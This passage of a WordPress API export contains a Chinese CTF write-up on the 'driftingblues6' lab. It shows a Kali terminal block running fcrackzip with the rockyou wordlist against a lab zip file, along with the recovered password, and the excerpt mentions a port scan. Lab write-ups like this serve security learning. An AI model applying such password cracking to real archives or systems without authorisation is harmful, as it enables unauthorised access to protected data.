data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427843.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412133743326\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427844.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427844.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412133929097\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u54c8\u54c8\u54c8\uff0c\u6682\u65f6\u7528\u4e0d\u4e86\uff0c\u4f46\u662f\u8bb0\u5f55\u4e00\u4e0b\uff0c\u4e07\u4e00\u4ee5\u540e\u6709\u4f2a\u52a0\u5bc6\u53ef\u4ee5\u7528\u4e00\u624b\uff01\uff01\uff01<\/p>\n<h3>fcrackzip<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ fcrackzip -D -u -p \/usr\/share\/wordlists\/rockyou.txt spammer.zip      \n\nPASSWORD FOUND!!!!: pw == myspace4<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues6 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.5 &#8212; -A  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-534","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=534"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/534\/revisions"}],"predecessor-version":[{"id":535,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/534\/revisions\/535"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=534"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=534"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}